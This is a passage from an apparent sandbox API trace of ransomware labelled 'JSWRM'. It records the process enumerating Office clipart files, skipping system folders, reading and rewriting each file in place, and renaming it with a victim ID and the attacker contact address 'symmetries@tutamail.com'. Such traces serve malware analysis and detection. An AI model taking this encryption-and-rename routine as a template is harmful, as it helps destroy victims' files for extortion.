cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VCTRN_01.MID", lpUsedDefaultChar=0x0) returned 12 [0099.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0099.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VCTRN_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VCTRN_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VCTRN_01.MID", lpUsedDefaultChar=0x0) returned 12 [0099.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0099.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0099.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0099.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\vctrn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.205] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4961) returned 1 [0099.205] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1360) returned 0x205850 [0099.205] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1360, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1360, lpOverlapped=0x0) returned 1 [0099.207] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.207] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1360, lpOverlapped=0x0) returned 1 [0099.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0099.208] CloseHandle (hObject=0x314) returned 1 [0099.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0099.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0099.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0099.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0099.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0099.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0099.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.208] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\vctrn_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\VCTRN_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\vctrn_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0099.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0099.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0099.209] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01219_.GIF", cAlternateFileName="")) returned 1 [0099.209] lstrcmpiW (lpString1="WB01219_.GIF", lpString2=".") returned 1 [0099.209] lstrcmpiW (lpString1="WB01219_.GIF", lpString2="..") returned 1 [0099.209] lstrcmpiW (lpString1="WB01219_.GIF", lpString2="...") returned 1 [0099.209] lstrcmpiW (lpString1="WB01219_.GIF", lpString2="windows") returned -1 [0099.209] lstrcmpiW (lpString1="WB01219_.GIF", lpString2="recovery") returned 1 [0099.209] lstrcmpiW (lpString1="WB01219_.GIF", lpString2="perflogs") returned 1 [0099.209] lstrcmpiW (lpString1="WB01219_.GIF", lpString2="documents and settings") returned 1 [0099.209] lstrcmpiW (lpString1="WB01219_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.209] lstrcmpiW (lpString1="WB01219_.GIF", lpString2="system volume information") returned 1 [0099.209] lstrcmpiW (lpString1="WB01219_.GIF", lpString2="msocache") returned 1 [0099.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0099.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01219_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01219_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01219_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0099.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0099.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01219_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01219_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01219_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0099.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0099.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0099.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0099.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01219_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01219_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.210] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=740) returned 1 [0099.210] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0099.210] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0099.212] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.212] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0099.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.212] CloseHandle (hObject=0x314) returned 1 [0099.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0099.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0099.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0099.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0099.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0099.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0099.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.212] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01219_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01219_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01219_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01219_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0099.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0099.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0099.213] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01237_.GIF", cAlternateFileName="")) returned 1 [0099.213] lstrcmpiW (lpString1="WB01237_.GIF", lpString2=".") returned 1 [0099.213] lstrcmpiW (lpString1="WB01237_.GIF", lpString2="..") returned 1 [0099.213] lstrcmpiW (lpString1="WB01237_.GIF", lpString2="...") returned 1 [0099.213] lstrcmpiW (lpString1="WB01237_.GIF", lpString2="windows") returned -1 [0099.213] lstrcmpiW (lpString1="WB01237_.GIF", lpString2="recovery") returned 1 [0099.213] lstrcmpiW (lpString1="WB01237_.GIF", lpString2="perflogs") returned 1 [0099.213] lstrcmpiW (lpString1="WB01237_.GIF", lpString2="documents and settings") returned 1 [0099.213] lstrcmpiW (lpString1="WB01237_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.213] lstrcmpiW (lpString1="WB01237_.GIF", lpString2="system volume information") returned 1 [0099.213] lstrcmpiW (lpString1="WB01237_.GIF", lpString2="msocache") returned 1 [0099.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0099.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01237_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01237_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01237_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0099.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0099.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01237_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01237_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01237_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0099.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0099.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0099.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0099.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01237_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01237_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.214] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=363) returned 1 [0099.214] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x160) returned 0x234a30 [0099.214] ReadFile (in: hFile=0x314, lpBuffer=0x234a30, nNumberOfBytesToRead=0x160, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x234a30*, lpNumberOfBytesRead=0x345e89c*=0x160, lpOverlapped=0x0) returned 1 [0099.256] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.256] WriteFile (in: hFile=0x314, lpBuffer=0x234a30*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x234a30*, lpNumberOfBytesWritten=0x345e898*=0x160, lpOverlapped=0x0) returned 1 [0099.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x234a30 | out: hHeap=0x1e0000) returned 1 [0099.257] CloseHandle (hObject=0x314) returned 1 [0099.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0099.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0099.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0099.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0099.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0099.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0099.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0099.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0099.257] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01237_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01237_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01237_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01237_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0099.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0099.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0099.259] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x167, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01238_.GIF", cAlternateFileName="")) returned 1 [0099.259] lstrcmpiW (lpString1="WB01238_.GIF", lpString2=".") returned 1 [0099.259] lstrcmpiW (lpString1="WB01238_.GIF", lpString2="..") returned 1 [0099.259] lstrcmpiW (lpString1="WB01238_.GIF", lpString2="...") returned 1 [0099.259] lstrcmpiW (lpString1="WB01238_.GIF", lpString2="windows") returned -1 [0099.259] lstrcmpiW (lpString1="WB01238_.GIF", lpString2="recovery") returned 1 [0099.259] lstrcmpiW (lpString1="WB01238_.GIF", lpString2="perflogs") returned 1 [0099.259] lstrcmpiW (lpString1="WB01238_.GIF", lpString2="documents and settings") returned 1 [0099.259] lstrcmpiW (lpString1="WB01238_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.259] lstrcmpiW (lpString1="WB01238_.GIF", lpString2="system volume information") returned 1 [0099.259] lstrcmpiW (lpString1="WB01238_.GIF", lpString2="msocache") returned 1 [0099.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0099.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01238_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01238_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01238_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0099.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0099.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01238_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01238_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01238_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0099.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0099.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0099.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0099.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01238_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01238_.gif"), 